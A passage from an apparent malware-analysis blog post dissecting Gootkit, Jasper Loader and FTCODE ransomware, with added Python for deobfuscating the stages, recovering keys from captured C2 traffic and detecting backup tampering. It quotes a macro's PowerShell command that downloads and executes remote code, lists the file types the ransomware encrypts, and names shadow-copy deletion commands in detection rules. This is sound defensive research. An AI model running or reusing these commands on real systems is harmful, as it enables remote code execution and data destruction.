<span class="ss">".das"</span><span class="p">,</span> <span class="ss">".iwi"</span><span class="p">,</span> <span class="ss">".litemod"</span><span class="p">,</span> <span class="ss">".asset"</span><span class="p">,</span> <span class="ss">".forge"</span><span class="p">,</span> <span class="ss">".ltx"</span><span class="p">,</span> <span class="ss">".bsa"</span><span class="p">,</span> <span class="ss">".apk"</span><span class="p">,</span> <span class="ss">".re4"</span><span class="p">,</span> <span class="ss">".sav"</span><span class="p">,</span> <span class="ss">".lbf"</span><span class="p">,</span> <span class="ss">".slm"</span><span class="p">,</span> <span class="ss">".bik"</span><span class="p">,</span> <span class="ss">".epk"</span><span class="p">,</span> <span class="ss">".rgss3a"</span><span class="p">,</span> <span class="ss">".pak"</span><span class="p">,</span> <span class="ss">".big"</span><span class="p">,</span> <span class="ss">"wallet"</span><span class="p">,</span> <span class="ss">".wotreplay"</span><span class="p">,</span> <span class="ss">".xxx"</span><span class="p">,</span> <span class="ss">".desc"</span><span class="p">,</span> <span class="ss">".py"</span><span class="p">,</span> <span class="ss">".m3u"</span><span class="p">,</span> <span class="ss">".flv"</span><span class="p">,</span> <span class="ss">".js"</span><span class="p">,</span> <span class="ss">".css"</span><span class="p">,</span> <span class="ss">".rb"</span><span class="p">,</span> <span class="ss">".p7c"</span><span class="p">,</span> <span class="ss">".pk7"</span><span class="p">,</span> <span class="ss">".p7b"</span><span class="p">,</span> <span class="ss">".p12"</span><span class="p">,</span> <span class="ss">".pfx"</span><span class="p">,</span> <span class="ss">".pem"</span><span class="p">,</span> <span class="ss">".crt"</span><span class="p">,</span> <span class="ss">".cer"</span><span class="p">,</span> <span class="ss">".der"</span><span class="p">,</span> 
<span class="ss">".x3f"</span><span class="p">,</span> <span class="ss">".srw"</span><span class="p">,</span> <span class="ss">".pef"</span><span class="p">,</span> <span class="ss">".ptx"</span><span class="p">,</span> <span class="ss">".r3d"</span><span class="p">,</span> <span class="ss">".rw2"</span><span class="p">,</span> <span class="ss">".rwl"</span><span class="p">,</span> <span class="ss">".raw"</span><span class="p">,</span> <span class="ss">".raf"</span><span class="p">,</span> <span class="ss">".orf"</span><span class="p">,</span> <span class="ss">".nrw"</span><span class="p">,</span> <span class="ss">".mrwref"</span><span class="p">,</span> <span class="ss">".mef"</span><span class="p">,</span> <span class="ss">".erf"</span><span class="p">,</span> <span class="ss">".kdc"</span><span class="p">,</span> <span class="ss">".dcr"</span><span class="p">,</span> <span class="ss">".cr2"</span><span class="p">,</span> <span class="ss">".crw"</span><span class="p">,</span> <span class="ss">".bay"</span><span class="p">,</span> <span class="ss">".sr2"</span><span class="p">,</span> <span class="ss">".srf"</span><span class="p">,</span> <span class="ss">".arw"</span><span class="p">,</span> <span class="ss">".3fr"</span><span class="p">,</span> <span class="ss">".dng"</span><span class="p">,</span> <span class="ss">".jpe"</span><span class="p">,</span> <span class="ss">".jpg"</span><span class="p">,</span> <span class="ss">".cdr"</span><span class="p">,</span> <span class="ss">".indd"</span><span class="p">,</span> <span class="ss">".ai"</span><span class="p">,</span> <span class="ss">".eps"</span><span class="p">,</span> <span class="ss">".pdf"</span><span class="p">,</span> <span class="ss">".pdd"</span><span class="p">,</span> <span class="ss">".dbf"</span><span class="p">,</span> <span class="ss">".mdf"</span><span class="p">,</span> <span class="ss">".wb2"</span><span class="p">,</span> <span class="ss">".rtf"</span><span class="p">,</span> <span 
class="ss">".wpd"</span><span class="p">,</span> <span class="ss">".dxg"</span><span class="p">,</span> <span class="ss">".xf"</span><span class="p">,</span> <span class="ss">".dwg"</span><span class="p">,</span> <span class="ss">".pst"</span><span class="p">,</span> <span class="ss">".accdb"</span><span class="p">,</span> <span class="ss">".mdb"</span><span class="p">,</span> <span class="ss">".pptm"</span><span class="p">,</span> <span class="ss">".pptx"</span><span class="p">,</span> <span class="ss">".ppt"</span><span class="p">,</span> <span class="ss">".xlk"</span><span class="p">,</span> <span class="ss">".xlsb"</span><span class="p">,</span> <span class="ss">".xlsm"</span><span class="p">,</span> <span class="ss">".xlsx"</span><span class="p">,</span> <span class="ss">".xls"</span><span class="p">,</span> <span class="ss">".wps"</span><span class="p">,</span> <span class="ss">".docm"</span><span class="p">,</span> <span class="ss">".docx"</span><span class="p">,</span> <span class="ss">".doc"</span><span class="p">,</span> <span class="ss">".odb"</span><span class="p">,</span> <span class="ss">".odc"</span><span class="p">,</span> <span class="ss">".odm"</span><span class="p">,</span> <span class="ss">".odp"</span><span class="p">,</span> <span class="ss">".ods"</span><span class="p">,</span> <span class="ss">".odt"</span><span class="p">,</span> <span class="ss">".lnk"</span><span class="p">,</span> <span class="ss">".iso"</span>
</pre></div>
<p></br></p>
Nicht so goot - Breaking down Gootkit and Jasper (+ FTCODE) (2019-10-02, by f0wL; tag:dissectingmalwa.re,2019-10-02:/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html)
<p>Pun intended. Gootkit is one of the most widespread banking malware families at the moment, and I deemed it a good opportunity to deobfuscate a bit of scrambled code.</p><p><center><img alt="A strange screenshot" src="https://dissectingmalwa.re/img/gootkit-img.png"></center></p>
<p></br></p>
<h4><em>A short disclaimer: downloading and running the samples linked below will compromise your computer and data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>Gootkit Stage 3 Sample available @ <a href="https://www.hybrid-analysis.com/sample/3e846a7316dbc15a38cfd522b14ad3f1a72d79959cbae9fd14621400d77cbc37/5d9887a1038838f483c956f3">Hybrid Analysis</a> --> <code>3e846a7316dbc15a38cfd522b14ad3f1a72d79959cbae9fd14621400d77cbc37</code></p>
<p></br></p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr"><a href="https://twitter.com/hashtag/gootkit?src=hash&ref_src=twsrc%5Etfw">#gootkit</a> <a href="https://twitter.com/hashtag/jasperloader?src=hash&ref_src=twsrc%5Etfw">#jasperloader</a> <a href="https://twitter.com/hashtag/banker?src=hash&ref_src=twsrc%5Etfw">#banker</a> <br>Js<a href="https://t.co/PsYBIeph19">https://t.co/PsYBIeph19</a><br>Payload<a href="https://t.co/hLThGNJDiK">https://t.co/hLThGNJDiK</a><br>IOCs<br>wws.tkgventures.[com <br>-> ont.carolinabeercompany.[com/bolp.cab<br>s/adp.reevesandcompany.[com/rbody320<a href="https://twitter.com/VK_Intel?ref_src=twsrc%5Etfw">@VK_Intel</a> <a href="https://twitter.com/malwrhunterteam?ref_src=twsrc%5Etfw">@malwrhunterteam</a> <a href="https://twitter.com/James_inthe_box?ref_src=twsrc%5Etfw">@James_inthe_box</a> <a href="https://twitter.com/reecdeep?ref_src=twsrc%5Etfw">@reecdeep</a></p>— JAMESWT (@JAMESWT_MHT) <a href="https://twitter.com/JAMESWT_MHT/status/1174296059344015361?ref_src=twsrc%5Etfw">September 18, 2019</a></blockquote></center> </p>
<p></br></p>
<p><center><img alt="Gootkit's Infection Path" src="https://dissectingmalwa.re/img/gootkit-infectionpath.png"></center></p>
<p></br></p>
<p><center><a href="https://github.com/f0wl/GootJasperDeobfuscator">f0wl/GootJasperDeobfuscator</a> on GitHub</center></p>
<p>With the obfuscated JavaScript and VB Script samples at hand, I thought it would be a good idea to build a simple Python script to clean up the mess Jasper Loader left us. If I come across a newer version I'll update the script; other than that, forks and PRs are always welcome as well.</p>
<p></br></p>
<p>The VB script used as the first stage isn't really that sophisticated. Each of its 2947 lines holds one ASCII character stored as its integer code with 302 added to it; the script subtracts 302 from every value, converts it back to a character and appends it to the string <em>fjuu</em>, which is executed via WScript once the decoding is complete. The dumped command is once again a long PowerShell command with a base64 segment.</p>
<p><center><img alt="Obfuscated VB Script" src="https://dissectingmalwa.re/img/gootkit-vbs.png"></center></p>
<p></br></p>
<p>This PS snippet will download and display the weird online pet store order confirmation and the second stage of the Jasper Loader (an obfuscated Javascript file).</p>
<p><center><img alt="Decoded Base64 Section of the PS Payload" src="https://dissectingmalwa.re/img/gootkit-vbsb64.png"></center></p>
<p></br></p>
<p>The JS stage includes a few unused variables, entangled functions and scrambled strings. These strings are concatenated into one big string in an array, which is run through two replacement functions and then split. The last step is a loop that calls the <em>geejc</em> function and selects every second character from the array to form the final PowerShell payload. The PS command contains a base64 encoded string, which I decoded as a separate step in the script. Pretty easy so far...</p>
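<p>As an added example (this is not the author's GootJasperDeobfuscator script and not loader code), the following Python decodes a constructed imitation of the two stages just described: the VBS "integer plus 302" encoding and the base64 segment of the PowerShell command it yields. The offset 302 and the variable name <em>fjuu</em> come from the post; the <code>-EncodedCommand</code>/<code>FromBase64String</code> shapes, the function names and all sample data are assumptions.</p>

```python
# Added example (not the author's GootJasperDeobfuscator and not loader code):
# decodes a constructed imitation of the two Jasper Loader stages described
# above.  Stage 1 is the VBS file whose lines each hold one ASCII code plus
# 302; the decoded text is a PowerShell command with a base64 segment.
# Assumptions: the offset 302 and the name fjuu are from the post; the
# -EncodedCommand/FromBase64String shapes and all sample data are constructed.
import base64
import re

VBS_OFFSET = 302  # from the post: every line is ord(char) + 302


def decode_vbs_stage(lines):
    """Rebuild the string the VBS stage calls fjuu: subtract the offset from
    each numeric line and turn the result back into a character."""
    chars = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue  # tolerate blank lines from copy/paste
        code = int(raw) - VBS_OFFSET
        if not 0 <= code < 0x110000:
            raise ValueError(f"line {raw!r} does not decode to a character")
        chars.append(chr(code))
    return "".join(chars)


# Two common ways a one-liner carries base64: the -EncodedCommand switch
# (payload is UTF-16LE) or an inline [Convert]::FromBase64String('...') call
# (payload is normally handed to an ASCII/UTF-8 GetString).
_ENC_CMD_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
_FROM_B64_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)


def extract_base64_segment(ps_command):
    """Return the decoded base64 segment of a PowerShell one-liner, or None."""
    m = _ENC_CMD_RE.search(ps_command)
    if m:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    m = _FROM_B64_RE.search(ps_command)
    if m:
        return base64.b64decode(m.group(1)).decode("utf-8")
    return None


def make_encoded_command(payload):
    """Constructed stage-2 command: a benign payload wrapped the way
    -EncodedCommand expects it (UTF-16LE, then base64)."""
    blob = base64.b64encode(payload.encode("utf-16-le")).decode("ascii")
    return "powershell -nop -w hidden -EncodedCommand " + blob


def build_sample_vbs_lines(text):
    """Constructed stage-1 input: encode text exactly as the loader does."""
    return [str(ord(c) + VBS_OFFSET) for c in text]


def demo():
    """Run the whole chain on constructed data and return each stage."""
    stage2 = make_encoded_command("Write-Output 'constructed sample'")
    vbs_lines = build_sample_vbs_lines(stage2)        # what the VBS file holds
    decoded_stage2 = decode_vbs_stage(vbs_lines)      # what WScript would run
    stage3 = extract_base64_segment(decoded_stage2)   # the base64 segment
    return {"lines": len(vbs_lines), "stage2": decoded_stage2, "stage3": stage3}


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

<p>On a real sample you would feed the lines of the VBS file to <code>decode_vbs_stage</code> and hand the result to <code>extract_base64_segment</code>; the range check on the decoded code points is what tells you quickly when a file uses a different offset than 302.</p>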
<p><center><img alt="Obfuscated Javascript" src="https://dissectingmalwa.re/img/gootkit-js.png"></center></p>
<p></br></p>
<p><center><img alt="js Extract deobfuscated" src="https://dissectingmalwa.re/img/gootkit-decr1.png"></center></p>
<p></br></p>
<p>Probably the easiest way to identify a Jasper Loader is the characteristic conditional at the top of the decoded base64 segment. First it checks whether the UI localization belongs to China, Romania, Russia, Ukraine or Belarus and exits if it does. Jasper will also quit if the WMI Computer_Model query returns a string associated with a VM guest system, for anti-analysis and sandbox evasion purposes.</p>
<p><center><img alt="js Extract Base64" src="https://dissectingmalwa.re/img/gootkit-decr2.png"></center></p>
<p></br></p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/gootkit-die.png"></center></p>
<p></br></p>
<p><center><img alt="bolp.inf File" src="https://dissectingmalwa.re/img/gootkit-inf.png"></center></p>
<p><center>A Setup Information (<em>.inf</em>) file dropped by the PE payload.</center></p>
<p></br></p>
<p><center><img alt="IDA: Screwed up call graph" src="https://dissectingmalwa.re/img/gootkit-idafsckup.png"></center></p>
<p>Looks like we've got some anti-analysis tricks with this binary as well... either way, IDA Free does not really like it and complains about being unable to fetch the imports. Scrambled Import Address Table, anyone? We'll take a closer peek later.</p>
<p></br></p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">NEW <a href="https://twitter.com/hashtag/FTCODE?src=hash&ref_src=twsrc%5Etfw">#FTCODE</a> <a href="https://twitter.com/hashtag/Ransomware?src=hash&ref_src=twsrc%5Etfw">#Ransomware</a> extension .FTCODE!Ransom note;READ_ME_NOW.htm <a href="https://twitter.com/BleepinComputer?ref_src=twsrc%5Etfw">@BleepinComputer</a> <a href="https://twitter.com/LawrenceAbrams?ref_src=twsrc%5Etfw">@LawrenceAbrams</a> <a href="https://twitter.com/demonslay335?ref_src=twsrc%5Etfw">@demonslay335</a> <a href="https://twitter.com/Amigo_A_?ref_src=twsrc%5Etfw">@Amigo_A_</a> <a href="https://t.co/Uc7OTIgg71">pic.twitter.com/Uc7OTIgg71</a></p>— Cyber Security (@GrujaRS) <a href="https://twitter.com/GrujaRS/status/1178776848244920320?ref_src=twsrc%5Etfw">September 30, 2019</a></blockquote></center></p>
<p></br></p>
<p>Another version of the Gootkit/Jasper combo surfaced on September 26th, when they swapped out the 3rd stage payload for FTCODE. Contrary to the belief of some researchers, this PowerShell based ransomware is not new and was first spotted in 2013 by Sophos analysts, as described in this <a href="https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/">article</a>. The link to the Any.Run analysis of the malicious Word document can be found <a href="https://app.any.run/tasks/3ac76703-6bcf-4fe9-86c2-91975a193428/">here</a>.</p>
<p><center><img alt="Malicious Word Document" src="https://dissectingmalwa.re/img/gootkit-doc.png"></center></p>
<p><center>The malicious macro in the Word document will download and execute the FTCODE PowerShell ransomware right away.</center></p>
<div class="highlight"><pre><span></span><span class="ss">"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"</span><span class="w"> </span><span class="err">$</span><span class="n">atwsxvg</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">[</span><span class="n">string</span><span class="o">][</span><span class="n">System.Text.Encoding</span><span class="o">]::</span><span class="nf">ASCII</span><span class="p">.</span><span class="n">GetString</span><span class="p">(</span><span class="o">[</span><span class="n">System.Convert</span><span class="o">]::</span><span class="n">FromBase64String</span><span class="p">(</span><span class="w"> </span><span class="s1">';;try{$a=(New-Object Net.WebClient).DownloadString("hxxp://aweb.theshotboard[.]info/?page=xing&vid=dc1:load");iex $a;}catch{}'</span><span class="w"> </span><span class="p">)</span><span class="w"> </span><span class="p">);</span><span class="n">iex</span><span class="w"> </span><span class="err">$</span><span class="n">atwsxvg</span><span class="p">;</span><span class="w"></span>
</pre></div>
<p></br></p>
<p><center><img alt="BXCODE string" src="https://dissectingmalwa.re/img/gootkit-bxcode.png"></center></p>
<p>Maybe a reference to the developer/group behind this attack? We won't know for sure, but the string "BXCODE hack your system" is present in all recent occurrences of FTCODE.</p>
<p></br></p>
<p><center><img alt="FTCode string" src="https://dissectingmalwa.re/img/gootkit-ft0.png"></center></p>
<p>Ladies and Gentlemen, this is the part of the code that gave today's ransomware its name. It will append the extension <em>.FTCODE</em> to every encrypted file and drop an HTML ransom note in the respective directories.</p>
<p></br></p>
<p><center><img alt="Jasper Country Query" src="https://dissectingmalwa.re/img/gootkit-jaspercountry.png"></center></p>
<p><center>Again, this PS script also features the "kill switch"/ evasion technique found in Jasper.</center></p>
<p><center><img alt="Jasper VM Query" src="https://dissectingmalwa.re/img/gootkit-jaspervm.png"></center></p>
<p></br></p>
<p><center><img alt="Communication with the C2" src="https://dissectingmalwa.re/img/gootkit-ft1.png"></center></p>
<p>Communication with the C&amp;C server is accomplished via <em>System.Net.WebClient</em> and POST requests to the hardcoded address. In this case the victim ID (a UUID) and the generated encryption key are transmitted in plain text, so a packet capture would get you the key, and therefore your data back, without paying the cyber-criminals :D</p>
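<p>As an added example (neither FTCODE's code nor the author's), the Python below recovers the victim ID and key from a captured check-in of the kind described above, which is the packet-capture route to the key. The HTTP request is constructed; the field names <code>guid</code> and <code>key</code>, the request path and the host are assumptions, since the real names are only visible in the screenshot.</p>

```python
# Added example, neither FTCODE's code nor the author's: recover the victim
# ID and key from a captured C2 check-in of the kind described above.  The
# request is constructed; the field names "guid" and "key", the path and
# the host are assumptions (the real names are only in the screenshot).
from urllib.parse import parse_qs
import uuid

_BODY = (b"guid=6f9619ff-8b86-d011-b42d-00c04fc964ff"
         b"&key=CONSTRUCTED_KEY_0123456789abcdef&ver=1")
CONSTRUCTED_CAPTURE = (
    b"POST /gate.php HTTP/1.1\r\n"
    b"Host: c2.example.invalid\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    + b"Content-Length: %d\r\n\r\n" % len(_BODY)
    + _BODY
)


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into (request line, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", len(body)))
    return lines[0], headers, body[:length]


def recover_victim_record(raw, id_field="guid", key_field="key"):
    """Return (victim_id, key) from a form-encoded POST, or None when the
    request does not have the check-in shape we expect."""
    request_line, headers, body = parse_http_request(raw)
    if not request_line.startswith("POST "):
        return None
    if "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
        return None
    fields = parse_qs(body.decode("utf-8", errors="replace"))
    if id_field not in fields or key_field not in fields:
        return None
    victim_id = fields[id_field][0]
    try:
        uuid.UUID(victim_id)  # the post says the victim ID is a UUID
    except ValueError:
        return None
    return victim_id, fields[key_field][0]


if __name__ == "__main__":
    print(recover_victim_record(CONSTRUCTED_CAPTURE))
```

<p>The UUID check is what keeps the parser from pairing a key with the wrong record when the same host also sees unrelated form posts; on a real capture you would run the function over every reassembled request to that host and keep the records whose victim ID matches the one in the ransom note.</p>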
<p></br></p>
<p><center><img alt="Killswitch File" src="https://dissectingmalwa.re/img/gootkit-killswitch.png"></center></p>
<p>Looks like FTCODE actually has a killswitch: if a file called <em>w00log03.tmp</em> is present in <em>%PUBLIC%\OracleKit</em>, the ransomware will create a new file called <em>good_day.log</em> and exit.</p>
<p></br></p>
<p><center><img alt="HTML Ransomnote" src="https://dissectingmalwa.re/img/gootkit-ft2.png"></center></p>
<p>Another run-of-the-mill behaviour of ransomware these days is to disable the recovery mode and delete the system backups and shadow copies. So nothing really new here either.</p>
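<p>As an added example (not from the post), here is a small detection pass over constructed process-creation log lines for the backup and recovery tampering just mentioned. The log format with <code>Image=</code>, <code>CommandLine=</code> and <code>ParentImage=</code> fields imitates a Sysmon Event ID 1 export and is an assumption; every log line is constructed.</p>

```python
# Added example (not from the post): a detection pass over constructed
# process-creation log lines for the recovery tampering described above.
# The log format (Image=/CommandLine=/ParentImage= fields) imitates a
# Sysmon Event ID 1 export and is an assumption; all lines are constructed.
import re

# Each rule: a label and a pattern over the command line.
RECOVERY_TAMPER_RULES = [
    ("shadow copy deletion", re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I)),
    ("shadow copy deletion (WMI)", re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("recovery disabled", re.compile(r"bcdedit(?:\.exe)?\b.*recoveryenabled\s+no", re.I)),
    ("boot failures ignored", re.compile(r"bcdedit(?:\.exe)?\b.*bootstatuspolicy\s+ignoreallfailures", re.I)),
    ("backup catalog deletion", re.compile(r"wbadmin(?:\.exe)?\s+delete\s+catalog", re.I)),
]

_LINE_RE = re.compile(r"^(?P<ts>\S+)\s.*?CommandLine=(?P<cmd>.*?)\s+ParentImage=(?P<parent>\S+)")

CONSTRUCTED_LOG = [
    "2019-09-26T10:01:02Z Image=C:\\Windows\\System32\\vssadmin.exe "
    "CommandLine=vssadmin.exe delete shadows /all /quiet "
    "ParentImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "2019-09-26T10:01:03Z Image=C:\\Windows\\System32\\bcdedit.exe "
    "CommandLine=bcdedit /set {default} recoveryenabled no "
    "ParentImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "2019-09-26T10:01:05Z Image=C:\\Windows\\System32\\notepad.exe "
    "CommandLine=notepad.exe C:\\Users\\Public\\notes.txt "
    "ParentImage=C:\\Windows\\explorer.exe",
    "2019-09-26T10:01:07Z Image=C:\\Windows\\System32\\wbadmin.exe "
    "CommandLine=wbadmin delete catalog -quiet "
    "ParentImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
]


def scan_log(lines):
    """Return (timestamp, rule label, command line, parent image) for every
    line whose command line matches one of the rules (first match wins)."""
    hits = []
    for line in lines:
        m = _LINE_RE.match(line)
        if not m:
            continue  # not a process-creation record in the expected shape
        cmd = m.group("cmd")
        for label, pattern in RECOVERY_TAMPER_RULES:
            if pattern.search(cmd):
                hits.append((m.group("ts"), label, cmd, m.group("parent")))
                break
    return hits


def severity(hits):
    """One tampering command is suspicious; two or more distinct techniques
    under the same parent image is the ransomware pattern described above."""
    if not hits:
        return "none"
    by_parent = {}
    for _, label, _, parent in hits:
        by_parent.setdefault(parent.lower(), set()).add(label)
    if any(len(labels) >= 2 for labels in by_parent.values()):
        return "high"
    return "medium"


if __name__ == "__main__":
    found = scan_log(CONSTRUCTED_LOG)
    for ts, label, cmd, parent in found:
        print(f"{ts} {label}: {cmd} (parent {parent})")
    print("severity:", severity(found))
```

<p>Grouping by parent image rather than alerting per line is the design choice worth noting: a lone administrator running one of these commands is a medium-confidence event, while a scripting host issuing several of them in sequence, as FTCODE does from PowerShell, is the signal to act on.</p>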
<p></br></p>
<p>FTCODE will encrypt all files with the following extensions:</p>
<div class="highlight"><pre><span></span><span class="ss">"*.sql"</span><span class="p">,</span><span class="ss">"*.mp4"</span><span class="p">,</span><span class="ss">"*.7z"</span><span class="p">,</span><span class="ss">"*.rar"</span><span class="p">,</span><span class="ss">"*.m4a"</span><span class="p">,</span><span class="ss">"*.wma"</span><span class="p">,</span><span class="ss">"*.avi"</span><span class="p">,</span><span class="ss">"*.wmv"</span><span class="p">,</span><span class="ss">"*.csv"</span><span class="p">,</span><span class="ss">"*.d3dbsp"</span><span class="p">,</span><span class="ss">"*.zip"</span><span class="p">,</span><span class="ss">"*.sie"</span><span class="p">,</span><span class="ss">"*.sum"</span><span class="p">,</span><span class="ss">"*.ibank"</span><span class="p">,</span><span class="ss">"*.t13"</span><span class="p">,</span><span class="ss">"*.t12"</span><span class="p">,</span><span class="ss">"*.qdf"</span><span class="p">,</span><span class="ss">"*.gdb"</span><span class="p">,</span><span class="ss">"*.tax"</span><span class="p">,</span><span class="ss">"*.pkpass"</span><span class="p">,</span><span class="ss">"*.bc6"</span><span class="p">,</span><span class="ss">"*.bc7"</span><span class="p">,</span><span class="ss">"*.bkp"</span><span class="p">,</span><span class="ss">"*.qic"</span><span class="p">,</span><span class="ss">"*.bkf"</span><span class="p">,</span><span class="ss">"*.sidn"</span><span class="p">,</span><span class="ss">"*.sidd"</span><span class="p">,</span><span class="ss">"*.mddata"</span><span class="p">,</span><span class="ss">"*.itl"</span><span class="p">,</span><span class="ss">"*.itdb"</span><span class="p">,</span><span class="ss">"*.icxs"</span><span class="p">,</span><span class="ss">"*.hvpl"</span><span class="p">,</span><span class="ss">"*.hplg"</span><span class="p">,</span><span class="ss">"*.hkdb"</span><span class="p">,</span><span class="ss">"*.mdbackup"</span><span class="p">,</span><span 
class="ss">"*.syncdb"</span><span class="p">,</span><span class="ss">"*.gho"</span><span class="p">,</span><span class="ss">"*.cas"</span><span class="p">,</span><span class="ss">"*.svg"</span><span class="p">,</span><span class="ss">"*.map"</span><span class="p">,</span><span class="ss">"*.wmo"</span><span class="p">,</span><span class="ss">"*.itm"</span><span class="p">,</span><span class="ss">"*.sb"</span><span class="p">,</span><span class="ss">"*.fos"</span><span class="p">,</span><span class="ss">"*.mov"</span><span class="p">,</span><span class="ss">"*.vdf"</span><span class="p">,</span><span class="ss">"*.ztmp"</span><span class="p">,</span><span class="ss">"*.sis"</span><span class="p">,</span><span class="ss">"*.sid"</span><span class="p">,</span><span class="ss">"*.ncf"</span><span class="p">,</span><span class="ss">"*.menu"</span><span class="p">,</span><span class="ss">"*.layout"</span><span class="p">,</span><span class="ss">"*.dmp"</span><span class="p">,</span><span class="ss">"*.blob"</span><span class="p">,</span><span class="ss">"*.esm"</span><span class="p">,</span><span class="ss">"*.vcf"</span><span class="p">,</span><span class="ss">"*.vtf"</span><span class="p">,</span><span class="ss">"*.dazip"</span><span class="p">,</span><span class="ss">"*.fpk"</span><span class="p">,</span><span class="ss">"*.mlx"</span><span class="p">,</span><span class="ss">"*.kf"</span><span class="p">,</span><span class="ss">"*.iwd"</span><span class="p">,</span><span class="ss">"*.vpk"</span><span class="p">,</span><span class="ss">"*.tor"</span><span class="p">,</span><span class="ss">"*.psk"</span><span class="p">,</span><span class="ss">"*.rim"</span><span class="p">,</span><span class="ss">"*.w3x"</span><span class="p">,</span><span class="ss">"*.fsh"</span><span class="p">,</span><span class="ss">"*.ntl"</span><span class="p">,</span><span class="ss">"*.arch00"</span><span class="p">,</span><span class="ss">"*.lvl"</span><span class="p">,</span><span 
class="ss">"*.snx"</span><span class="p">,</span><span class="ss">"*.cfr"</span><span class="p">,</span><span class="ss">"*.ff"</span><span class="p">,</span><span class="ss">"*.vpp_pc"</span><span class="p">,</span><span class="ss">"*.lrf"</span><span class="p">,</span><span class="ss">"*.m2"</span><span class="p">,</span><span class="ss">"*.mcmeta"</span><span class="p">,</span><span class="ss">"*.vfs0"</span><span class="p">,</span><span class="ss">"*.mpqge"</span><span class="p">,</span><span class="ss">"*.kdb"</span><span class="p">,</span><span class="ss">"*.db0"</span><span class="p">,</span><span class="ss">"*.dba"</span><span class="p">,</span><span class="ss">"*.rofl"</span><span class="p">,</span><span class="ss">"*.hkx"</span><span class="p">,</span><span class="ss">"*.bar"</span><span class="p">,</span><span class="ss">"*.upk"</span><span class="p">,</span><span class="ss">"*.das"</span><span class="p">,</span><span class="ss">"*.iwi"</span><span class="p">,</span><span class="ss">"*.litemod"</span><span class="p">,</span><span class="ss">"*.asset"</span><span class="p">,</span><span class="ss">"*.forge"</span><span class="p">,</span><span class="ss">"*.ltx"</span><span class="p">,</span><span class="ss">"*.bsa"</span><span class="p">,</span><span class="ss">"*.apk"</span><span class="p">,</span><span class="ss">"*.re4"</span><span class="p">,</span><span class="ss">"*.sav"</span><span class="p">,</span><span class="ss">"*.lbf"</span><span class="p">,</span><span class="ss">"*.slm"</span><span class="p">,</span><span class="ss">"*.bik"</span><span class="p">,</span><span class="ss">"*.epk"</span><span class="p">,</span><span class="ss">"*.rgss3a"</span><span class="p">,</span><span class="ss">"*.pak"</span><span class="p">,</span><span class="ss">"*.big"</span><span class="p">,</span><span class="ss">"*wallet"</span><span class="p">,</span><span class="ss">"*.wotreplay"</span><span class="p">,</span><span class="ss">"*.xxx"</span><span 
class="p">,</span><span class="ss">"*.desc"</span><span class="p">,</span><span class="ss">"*.py"</span><span class="p">,</span><span class="ss">"*.m3u"</span><span class="p">,</span><span class="ss">"*.flv"</span><span class="p">,</span><span class="ss">"*.js"</span><span class="p">,</span><span class="ss">"*.css"</span><span class="p">,</span><span class="ss">"*.rb"</span><span class="p">,</span><span class="ss">"*.png"</span><span class="p">,</span><span class="ss">"*.jpeg"</span><span class="p">,</span><span class="ss">"*.txt"</span><span class="p">,</span><span class="ss">"*.p7c"</span><span class="p">,</span><span class="ss">"*.p7b"</span><span class="p">,</span><span class="ss">"*.p12"</span><span class="p">,</span><span class="ss">"*.pfx"</span><span class="p">,</span><span class="ss">"*.pem"</span><span class="p">,</span><span class="ss">"*.crt"</span><span class="p">,</span><span class="ss">"*.cer"</span><span class="p">,</span><span class="ss">"*.der"</span><span class="p">,</span><span class="ss">"*.x3f"</span><span class="p">,</span><span class="ss">"*.srw"</span><span class="p">,</span><span class="ss">"*.pef"</span><span class="p">,</span><span class="ss">"*.ptx"</span><span class="p">,</span><span class="ss">"*.r3d"</span><span class="p">,</span><span class="ss">"*.rw2"</span><span class="p">,</span><span class="ss">"*.rwl"</span><span class="p">,</span><span class="ss">"*.raw"</span><span class="p">,</span><span class="ss">"*.raf"</span><span class="p">,</span><span class="ss">"*.orf"</span><span class="p">,</span><span class="ss">"*.nrw"</span><span class="p">,</span><span class="ss">"*.mrwref"</span><span class="p">,</span><span class="ss">"*.mef"</span><span class="p">,</span><span class="ss">"*.erf"</span><span class="p">,</span><span class="ss">"*.kdc"</span><span class="p">,</span><span class="ss">"*.dcr"</span><span class="p">,</span><span class="ss">"*.cr2"</span><span class="p">,</span><span class="ss">"*.crw"</span><span 
